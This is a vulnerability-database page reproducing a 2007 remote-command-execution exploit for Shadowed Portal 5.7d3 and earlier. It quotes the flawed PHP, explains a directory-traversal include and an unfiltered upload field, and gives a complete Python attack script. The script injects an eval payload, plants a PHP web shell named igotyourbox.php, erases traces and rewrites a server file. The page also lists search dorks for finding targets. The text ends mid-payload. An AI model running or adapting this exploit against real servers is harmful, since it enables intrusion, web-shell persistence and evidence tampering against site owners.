Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Shadowed Portal <= 5.7d3 Remote Command Execution Exploit

🗓️ 21 Dec 2007 00:00:00Reported by ParadoxType 
zdt
 zdt🔗 0day.today👁 39 Views

Shadowed Portal <= 5.7d3 Remote Command Execution Exploit, 21/12/200

Code
=========================================================
Shadowed Portal <= 5.7d3 Remote Command Execution Exploit
=========================================================



#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                           
------------------------------------------------------------------------------------------------
This is a Public Exploit. 21/12/2007 (dd-mm-yyyy)
------------------------------------------------------------------------------------------------
§ Shadowed Portal 5.7 and maybe lower - Remote Command Execution Vulnerabilities §
Vendor:	  http://www.shad0wed.com
Severity: Highest
Author:	  The:Paradox


Proud to be Italian.
------------------------------------------------------------------------------------------------
Related Codes:

-- control.php; line 1:

<?php

require("config.php");

require("globals.php");

require("functions.php");

require("variables.php");

$return = setvar("return");

if($act == "login") {

$online = 0;

$usr = $_POST['usr'];

$pwd = $_POST['pwd'];

if(file_exists($root."/users/".strtolower($usr).".php")) {

require($root."/users/".strtolower($usr).".php");

}

-- globals.php; line 1:

<?php

define('CHECK',md5("null"));

global $viv;

global $mod;

global $act;

global $do;

global $act;

global $id;

global $tp;

global $w;

global $method;

global $board;

global $user;

global $pass;

global $cat;

global $linkback;

global $HTTP_POST_VARS;

global $_GET;

global $_POST;

global $_FILES;

global $HTTP_REFERER;

global $_SERVER;

-- /modules/fs/mod.php; line 1:

<?php

if(!defined('CHECK')) { exit; }

-- /modules/fs/mod.php; line 277:

if($do == "_upload") {

echo <<<HTML

<table width="100%" $sp_table>

<tr $sp_htr><td align="center" $sp_htd>FS: Upload</td></tr>

<tr $sp_ctr><td $sp_ctd>

HTML;

if($ls == $login_session) {

$err = 0;

$id = make_code(50);

$product = alter($_POST['product']);

$publisher = alter($_POST['publisher']);

$category = alter($_POST['category']);

$product_website = alter($_POST['product_website']);

$description = alter($_POST['description']);

$ext = substr(strrchr($_FILES['upload']['name'],"."),1);

if(blankc($_FILES['upload']['name'],"Upload")) { $err = 1; }

if(blankc($product,"Product")) { $err = 1; }

if(blankc($category,"Category")) { $err = 1; }

if(blankc($description,"Description")) { $err = 1; }

if($_FILES['upload']['size'] > FS_MAX_SIZE) { derr("File is too large. Limit: ".$fs_max_size); $err = 1; }

if($fs_ext_allow != "") {

$arr = explode(",",$fs_ext_allow);

$err = 1;

foreach($arr as $single) {

if(strtolower($ext) == strtolower($single)) { $err = 0; }

}

if($err == 1) { derr("File extension ($ext) is not allowed. Extensions allowed are: ".str_replace(",",", ",$fs_ext_allow));  }

}

else {

$arr = explode(",",$fs_ext_unallow);

foreach($arr as $single) {

if(strtolower($ext) == strtolower($single)) { derr("File extension ($single) is not allowed."); $err = 1; }

}

}

if($err == 0) {

if(move_uploaded_file($_FILES['upload']['tmp_name'],$mod_root."/uploads/".$id)) {

$fs_files = "";

require($root."/users/".strtolower($usr).".php");

$fs_files .= "||" . $id;

$name = basename($_FILES['upload']['name']);

$author = $usr;

$date_posted = $date;

$downloads = 0;

$rating = 0;

if($u_rank >= $rank_required['mod_admin']) {

$access = alter($_POST['access']);

}

else {

$access = 0;

}

define('FS_WRITE',"edit");

require($mod_root."/fs_file.php");

wf($mod_root."/files/".$id.".php","w",$fs_file);

require($root."/user_info.php");

wf($root."/users/".strtolower($usr).".php","w",$user_info);

echo <<<HTML

File successfully uploaded.<br />

<div align="center">

(<a href="$mod_url&do=view&id=$id">View File</a>)<br />

(<a href="$mod_url&do=manage">Manage Uploads</a>)<br />

(<a href="$mod_url&do=upload">Upload Another File</a>)<br />

</div>

HTML;

}

else { derr("Failed to upload file."); }

}

}

else { derr("Bad session."); }

echo <<<HTML

</td></tr>

</table>

HTML;

}

------------------------------------------------------------------------------------------------
Bug Explanation:

This Portal presents a vulnerability in the "login system" that allows us to require a page ".php" in the directory "/users/" (whatever using directory transversal ("../") we can require any page).

Additionally "Check" was defined by the required page globals.php, allowing us to bypass the "security-die" on the top of most php page (see /modules/fs/mod.php; line 1).
In this exploit we will require "/modules/fs/mod.php" to be able to upload files.
The uploader is secure but mod.php creates a "description file" of the upload, in this file the $access variabile is not correctly filtered.

Normally that var could be given only by administrators ($u_rank >= $rank_required['mod_admin']) but in our particular case $rank_required['mod_admin'] has no values (Because the "first require trick" has skipped some includes) , and a $variable_with_value is always > $variabile_without_value.

We will insert malicious php code in it, and get command execution. Whatever the "description page" won't be directly accessible, but there is no problem for us: just require it through control.php again =D (To make RCE easier, in the exploit i will create an accessibile php page in the "/" path).
------------------------------------------------------------------------------------------------
The require in control.php is extremely unsafe, it could be used with other pages to obtain other vulnerabilities.
------------------------------------------------------------------------------------------------
Google Dork-> Powered by Shadowed Portal
Google Dork-> These script's code is Copyright 2003-2006 by Shadowed Works.
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
------------------------------------------------------------------------------------------------
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:

import httplib, urllib, sys
print "\n################################################"
print "      Shadowed Portal 5.7d3 and maybe lower     "
print "        Remote Command Execution Exploit        "
print "                                                "
print "            Discovered By The:Paradox           "          
print "                                                "
print " Usage:                                         " 
print " python %s [Target] [Path]     	               " % (sys.argv[0])
print "                                                "	
print " Example:                                       " 			
print " python %s 127.0.0.1 /shadowed/                 " % (sys.argv[0])
print " python %s www.host.com /                       " % (sys.argv[0])	
print "                                                "	
print "                                                "		
print "################################################\n"
if len(sys.argv)<=1:	sys.exit()
else:   print "[.]Exploit Starting."		
port = "80"
target = sys.argv[1]
try: path = sys.argv[2]
except IndexError: path = "/"

######################################################## Modify only if you know what are you doing.


boundary = '190489618919464387081597939530'
foo = '\r\n'

def contentdef(name, value):
	arr = []
	arr.append('-----------------------------' + boundary)
	arr.append('Content-Disposition: form-data; name="%s"' % name)
	arr.append('')
	arr.append(value)
	arr.append('')
	return foo.join(arr)

def contentdeffile(name, filename, ctype, value):
	arr = []
	arr.append('-----------------------------' + boundary)
	arr.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (name,filename))
	arr.append('Content-Type: ' + ctype)
	arr.append('')
	arr.append(value)
	arr.append('')
	arr.append('-----------------------------' + boundary + '--')
	return foo.join(arr)

postcontent = contentdef("usr","../modules/fs/mod") + contentdef("do","_upload") + contentdef("mod_root","./modules/fs/") + contentdef("pwd","XxX") + contentdef("product","Product") + contentdef("publisher","Publisher") + contentdef("category","Category") + contentdef("product_website","Website") + contentdef("access","-1; eval(stripslashes(getenv(HTTP_REFERER)))") + contentdef("description","Description") + contentdeffile("upload","1.txt","text/plain",".:|31337|:.")
#Some Greetz to nexen for the "Getenv-Eval" idea (we can't use $ char)
#print postcontent

conn = httplib.HTTP(target,port)
conn.putrequest('POST', path + "control.php?act=login")
conn.putheader('Accept', 'text/plain')
conn.putheader('Content-type', 'multipart/form-data; boundary=---------------------------'+ boundary)
conn.putheader('Content-length', str(len(postcontent)))
conn.endheaders()
conn.send(postcontent)
a, b, c = conn.getreply()
print "[.]Connecting... -->",a,b
try: 
	response = conn.file.read()	
	code = response.split('do=view&id=')[1].split('">')[0]
	#print code
except IndexError:
	sys.exit("[-]Unable to get $id. Some error occured. The server response was:\r\n\r\n" + response)

conn = httplib.HTTPConnection(target,port)
conn.request("POST", path + "control.php?act=login", urllib.urlencode({'usr': '../modules/fs/files/'+ code, 'pwd': 'XxX'}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": '$r0x = fopen ("igotyourbox.php", "w+"); fwrite ($r0x, urldecode("%3C%3FPHP+eval(stripslashes(%24_REQUEST%5Bdox%5D))%3B+%3F%3E")); fclose($r0x);die;'})
response = conn.getresponse()
print "[.]Creating the new php page. -->",response.status, response.reason
conn.close()

conn = httplib.HTTPConnection(target,port)
conn.request("GET", path + "igotyourbox.php")
response = conn.getresponse()
print "[.]Verifying existence of created page. -->",response.status, response.reason

if response.status == 404:
	sys.exit("[-]Not found. Exploit Failed.\r\n Maybe we don't have rights to write file in / path.")
else:
	print "[+]Done."

#Removing our traces. =)

conn = httplib.HTTPConnection(target,port)
conn.request("POST", path + "igotyourbox.php", urllib.urlencode({'dox': "unlink('./modules/fs/files/" + code + ".php'); $dir = \"./modules/fs/uploads\"; $handle = opendir($dir); while($file = readdir($handle)) { $loc = $dir.\"/\".$file; if(!is_dir($loc) && eregi(\".:|31337|:.\", file_get_contents($loc))) unlink(\"$loc\"); }"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[+]Removing Our Traces. -->",response.status, response.reason
conn.close()

#'Cause mod.php has been corrupted, we'll repair it.

conn = httplib.HTTPConnection(target,port)
conn.request("POST", path + "igotyourbox.php", urllib.urlencode({'dox': "$r0x = fopen (\"./modules/fs/mod.php\", \"w+\"); fwrite ($r0x, urldecode(\"%3C%3Fphp%0A%0Aif(!defined('CHECK'))+%7B+exit%3B+%7D%0A%0Arequire(%24mod_root.%22%2Fconfig.php%22)%3B%0A%0A%24id+%3D+strip_dir_illegals(%24id)%3B%0A%0Aif((!isset(%24do))+%7C%7C+(%24do+%3D%3D+%22%22))+%7B%0A%0Arequire(%24mod_root.%22%2Fcategories.php%22)%3B%0A%0Aif((!isset(%24cat))+%7C%7C+(%24cat+%3D%3D+%22%22))+%7B%0A%0A%24list+%3D+%24categories%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24list+%3D+%24subcat%5B%22%24cat%22%5D%3B%0A%0A%7D%0A%0A%2F%2F+Count+Files+%2F%2F%0A%0A%24count_incat+%3D+array()%3B%0A%0A%24dir+%3D+%24mod_root.%22%2Ffiles%22%3B%0A%0A%24handle+%3D+opendir(%24dir)%3B%0A%0Awhile(%24file+%3D+readdir(%24handle))+%7B%0A%0A%24loc+%3D+%24dir.%22%2F%22.%24file%3B%0A%0Aif(!is_dir(%24loc))+%7B%0A%0Aif(strrchr(%24file%2C%22.%22)+%3D%3D+%22.php%22)+%7B%0A%0Ainclude(%24loc)%3B%0A%0A%24count_incat%5B%22%24fs_category%22%5D%2B%2B%3B%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0A%2F%2F+End+%2F%2F%0A%0Aecho+%22%3Cdiv+align%3D%5C%22right%5C%22%3E%3Ctable+%24sp_table%3E%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%5C%22%24mod_url%5C%22%3EDownloads%3C%2Fa%3E+%26gt%3B+Browse%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fdiv%3E%3Cbr+%2F%3E%22%3B%0A%0Aif(%24list+!%3D+%22%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+%24sp_htd%3ECategories%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%24arr+%3D+explode(%22%7C%7C%22%2C%24list)%3B%0A%0Anatcasesort(%24arr)%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(%24single+!%3D+%22%22)+%7B%0A%0A%24arrx+%3D+explode(%22%26%26%22%2C%24single)%3B%0A%0A%24desc+%3D+%24cat_description%5B%22%24arrx%5B1%5D%22%5D%3B%0A%0A%24inner_count+%3D+count(explode(%22%7C%7C%22%2C%24subcat%5B%22%24arrx%5B1%5D%22%5D))+-+1%3B%0A%0A%24inner_out+%3D+%22%22%3B%0A%0Aif(%24inner_count+%3C%3D+0)+%7B+%24inner_count+%3D+0%3B+%7D%0A%0Aelse+%7B%0A%0A%24inner_out+%3D+%22%7C%7C+%3Cb%3ESub+Categories%3A%3C%2Fb%3E+%24inner_count%3C%2Fi%3E%22%3B%0A%0A%7D%0A%0A%24incat+%3D+%24count_incat%5B%22%24arrx%5B1%5D%22%5D%3B%0A%0Aif(%24incat+%3D%3D+%22%22)+%7B+%24incat+%3D+0%3B+%7D%0A%0Aif(%24desc+!%3D+%22%22)+%7B+%24desc+%3D+%24desc.%22%3Cbr+%2F%3E%22%3B+%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3E%3Ca+href%3D%22%24mod_url%26cat%3D%24arrx%5B1%5D%22%3E%24arrx%5B0%5D%3C%2Fa%3E%3C%2Fb%3E%3Cbr+%2F%3E%0A%0A%24desc%0A%0A%3Cb%3EFiles%3A%3C%2Fb%3E+%24incat+%24inner_out%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0A%7D%0A%0Aecho+%22%3C%2Ftable%3E%3Cbr+%2F%3E%22%3B%0A%0A%7D%0A%0A%24out_files+%3D+%22%22%3B%0A%0A%24count_files+%3D+0%3B%0A%0A%24dir+%3D+%24mod_root.%22%2Ffiles%22%3B%0A%0A%24handle+%3D+opendir(%24dir)%3B%0A%0Awhile(%24file+%3D+readdir(%24handle))+%7B%0A%0A%24loc+%3D+%24dir.%22%2F%22.%24file%3B%0A%0Aif(!is_dir(%24loc))+%7B%0A%0Aif(strtolower(strrchr(%24file%2C%22.%22))+%3D%3D+%22.php%22)+%7B%0A%0Arequire(%24loc)%3B%0A%0A%24count_files%2B%2B%3B%0A%0Aif(%24fs_category+%3D%3D+%24cat)+%7B%0A%0A%24name+%3D+str_replace(%22.php%22%2C%22%22%2C%24file)%3B%0A%0A%24f_size+%3D+filesize(%24mod_root.%22%2Fuploads%2F%22.%24name)%3B%0A%0A%24out_website+%3D+%22(none)%22%3B%0A%0Aif(%24fs_website+!%3D+%22%22)+%7B%0A%0Aif(strpos(%24fs_website%2C%22%2F%22)+%3D%3D+false)+%7B+%24fs_website+%3D+%22http%3A%2F%2F%22+.+%24fs_website%3B+%7D%0A%0A%24out_website+%3D+%22%3Ca+href%3D%5C%22%24fs_website%5C%22%3EVisit%3C%2Fa%3E%22%3B%0A%0A%7D%0A%0A%24desc+%3D+add_spcode(%24fs_description)%3B%0A%0A%24out_files+.%3D+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3E%3Ca+href%3D%22%24mod_url%26do%3Dview%26id%3D%24name%22%3E%24fs_product%3C%2Fa%3E%3C%2Fb%3E%3Cbr+%2F%3E%0A%0A%24desc%3Cbr+%2F%3E%0A%0A%3Cb%3ESize%3A%3C%2Fb%3E+%24f_size+%7C%7C+%3Cb%3EPublisher%3A%3C%2Fb%3E+%24fs_publisher+%7C%7C+%3Cb%3EWebsite%3A%3C%2Fb%3E+%24out_website%3Cbr+%2F%3E%0A%0A%3Cb%3EDate+Posted%3A%3C%2Fb%3E+%24fs_date+%7C%7C+%3Cb%3EDownloads%3A%3C%2Fb%3E+%24fs_downloads+%7C%7C+%3Cb%3ERating%3A%3C%2Fb%3E+%24fs_rating%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0Aif((isset(%24cat))+%7C%7C+(%24cat+!%3D+%22%22))+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+%24sp_htd%3EFiles%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%24out_files%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aecho+%22%3Cdiv+align%3D%5C%22center%5C%22%3EThere+are+%24count_files+files+in+the+database.%3C%2Fdiv%3E%3Cbr+%2F%3E%22%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22do_dl%22)+%7B+echo+%24_SERVER%5B'HTTP_REFERER'%5D.%22%3A%22%3B+%7D%0A%0Aif(%24do+%3D%3D+%22dl%22)+%7B%0A%0Aif(strpos(%24_SERVER%5B'HTTP_REFERER'%5D%2C%24url)+!%3D%3D+false)+%7B%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_download'%5D)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22))+%7B%0A%0Ainclude(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0Aif(%24u_rank+%3E%3D+%24fs_access)+%7B%0A%0A%24f_size+%3D+filesize(%24mod_root.%22%2Fuploads%2F%22.%24id)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Cdiv+align%3D%22right%22%3E%3Ca+href%3D%22%24mod_url%22%3EDownloads%3C%2Fa%3E+%26gt%3B+%24fs_product+%26gt%3B+Download+Now%3C%2Fdiv%3E%3Cbr+%2F%3E%0A%0A%3Cspan+class%3D%22title%22%3E%24fs_product%3C%2Fspan%3E%3Cbr+%2F%3E%0A%0A%3Cbr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%3Ctable+border%3D%220%22+cellspacing%3D%224%22+cellpadding%3D%220%22%3E%0A%0A%3Ctr%3E%3Ctd+width%3D%22150%22%3EFile+Name%3A%3C%2Ftd%3E%3Ctd%3E%24fs_product%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EPublisher%3A%3C%2Ftd%3E%3Ctd%3E%24fs_publisher%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EFile+Size%3A%3C%2Ftd%3E%3Ctd%3E%24f_size%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0A%3Cspan+id%3D%22dl%22%3EYou+are+now+downloading+%24fs_product.+Your+download+will+begin+is+%3Cspan+id%3D%22count%22+style%3D%22font-weight%3A+bold%3B%22%3E%24fs_count_down%3C%2Fspan%3E+seconds.%3Cbr+%2F%3E%3C%2Fspan%3E%0A%0A%3Cscript+language%3D%22JavaScript%22%3E%0A%0A%3C!--%0A%0Avar+countDown+%3D+%24fs_count_down%3B%0A%0Afunction+timer()+%7B%0A%0AcountDown--%3B%0A%0Adocument.getElementById('count').innerHTML+%3D+countDown%3B%0A%0Aif(countDown+%3D%3D+0)+%7B%0A%0A%2F%2Flocation.replace(%22%24mod_url%26do%3Ddl_go%26id%3D%24id%22)%3B%0A%0Adocument.getElementById('dl').innerHTML+%3D+%22%3Cb%3E%3Ca+href%3D'%24mod_url%26do%3Ddl_go%26id%3D%24id'%3EBegin+Download%3C%2Fa%3E%3C%2Fb%3E%3Cbr+%2F%3E%22%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0AsetTimeout(%22timer()%3B%22%2C1000)%3B%0A%0A%7D%0A%0A%7D%0A%0Atimer()%3B%0A%0A--%3E%0A%0A%3C%2Fscript%3E%0A%0A%3Cnoscript%3E%0A%0A%3Cbr+%2F%3E%0A%0AJavaScript+is+not+enabled.+Please+click+the+following+link%3A%3Cbr+%2F%3E%0A%0A%3Ca+href%3D%22%24mod_url%26do%3Ddo_dl%26id%3D%24id%22%3EDownload%3C%2Fa%3E%3Cbr+%2F%3E%0A%0A%3C%2Fnoscript%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0Aif((%24fs_access+%3D%3D+0)+%26%26+(%24online+%3D%3D+0))+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AYou+must+be+logged+in+to+download+this+file.+Please+login.%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0AHTML%3B%0A%0A%24viv+%3D+%22Login%22%3B%0A%0A%7D%0A%0Aelse+%7B+%24viv+%3D+%22Not_Enough_Access%22%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0Aelse+%7B%0A%0Aif((%24rank_required%5B'mod_download'%5D+%3D%3D+0)+%26%26+(%24online+%3D%3D+0))+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AYou+must+be+logged+in+to+download+this+file.+Please+login.%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0AHTML%3B%0A%0A%24viv+%3D+%22Login%22%3B%0A%0A%7D%0A%0Aelse+%7B+%24viv+%3D+%22Not_Enough_Access%22%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0Aelse+%7B+derr(%22This+page+cannot+be+accessed+remotely.%22)%3B+%7D%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22view%22)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22))+%7B%0A%0Ainclude(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0A%24f_size+%3D+filesize(%24mod_root.%22%2Fuploads%2F%22.%24id)%3B%0A%0A%24desc+%3D+add_vxcode(%24fs_description%2C0)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Cdiv+align%3D%22right%22%3E%3Ca+href%3D%22%24mod_url%22%3EDownloads%3C%2Fa%3E+%26gt%3B+%24fs_product%3C%2Fdiv%3E%3Cbr+%2F%3E%0A%0A%3Cspan+class%3D%22title%22%3E%24fs_product%3C%2Fspan%3E%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+border%3D%220%22+cellspacing%3D%224%22+cellpadding%3D%220%22%3E%0A%0A%3Ctr+valign%3D%22top%22%3E%3Ctd+width%3D%2230%25%22%3E%0A%0A%3Ca+href%3D%22%24mod_url%26do%3Ddl%26id%3D%24id%22%3E%3Cimg+src%3D%22%24url%2Fmodules%2F%24mod%2Fimages%2Fdownload.gif%22+border%3D%220%22+alt%3D%22Download%22+%2F%3E%3C%2Fa%3E%0A%0A%3C%2Ftd%3E%3Ctd+width%3D%2270%25%22%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EFile%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_name%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3ESize%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24f_size%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EPublisher%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%22%24fs_website%22%3E%24fs_publisher%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EUploaded+By%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_author%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EDate+Posted%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_date%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EDownloads%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_downloads%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3ERating%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_rating%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3Chr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+%24sp_htd%3EDescription%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%24desc%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aelse+%7B+derr(%22File+not+found.%22)%3B+%7D%0A%0A%7D%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_account'%5D)+%7B%0A%0Aif(%24do+%3D%3D+%22upload%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EFS%3A+Upload%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%3Cform+action%3D%22%24mod_url%26do%3D_upload%26ls%3D%24login_session%22+method%3D%22POST%22+enctype%3D%22multipart%2Fform-data%22%3E%0A%0A%3Cfieldset%3E%0A%0A%3Clegend%3EFile%3C%2Flegend%3E%0A%0A%3Ctable+cellspacing%3D%224%22+cellpadding%3D%220%22+border%3D%220%22%3E+%0A%0A%3Ctr%3E%3Ctd%3ELocation%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22file%22+name%3D%22upload%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3C%2Ffieldset%3E%3Cbr+%2F%3E%0A%0A%3Cfieldset%3E%0A%0A%3Clegend%3EInformation%3C%2Flegend%3E%0A%0A%3Ctable+cellspacing%3D%224%22+cellpadding%3D%220%22+border%3D%220%22%3E+%0A%0A%3Ctr%3E%3Ctd%3EProduct%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22product%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EPublisher%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22publisher%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3ECategory%3A%3C%2Ftd%3E%3Ctd%3E%0A%0A%3Cselect+name%3D%22category%22+%2F%3E%0A%0AHTML%3B%0A%0A%24categories+%3D+%22%22%3B%0A%0A%24out+%3D+array()%3B%0A%0Arequire(%24mod_root.%22%2Fcategories.php%22)%3B%0A%0Aunset(%24names)%3B%0A%0Awhile(%24categories+!%3D+%22%22)+%7B%0A%0A%24sub+%3D+array()%3B%0A%0A%24arr+%3D+explode(%22%7C%7C%22%2C%24categories)%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(%24single+!%3D+%22%22)+%7B%0A%0A%24arrx+%3D+explode(%22%26%26%22%2C%24single)%3B%0A%0Aarray_push(%24out%2C%22%3C!--+%24arrx%5B0%5D+--%3E%3Coption+value%3D%5C%22%24arrx%5B1%5D%5C%22%3E%24arrx%5B0%5D%3C%2Foption%3E%5Cn%22)%3B%0A%0Aarray_push(%24sub%2C%24arrx%5B1%5D)%3B%0A%0A%24names%5B%22%24arrx%5B1%5D%22%5D+%3D+%24arrx%5B0%5D%3B%0A%0A%7D%0A%0A%7D%0A%0A%24categories+%3D+%22%22%3B%0A%0Aforeach(%24sub+as+%24single)+%7B%0A%0A%24categories+.%3D+str_replace(%22%7C%7C%22%2C%22%7C%7C%22.%24names%5B%22%24single%22%5D.%22+%2F+%22%2C%24subcat%5B%22%24single%22%5D)%3B%0A%0A%7D%0A%0A%7D%0A%0Anatcasesort(%24out)%3B%0A%0Aforeach(%24out+as+%24single)+%7B%0A%0Aecho+%24single%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3C%2Fselect%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EWebsite%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22product_website%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_admin'%5D)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr%3E%3Ctd%3EAccess+to+Download%3Cbr+%2F%3E(Besides+Default)%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22access%22+value%3D%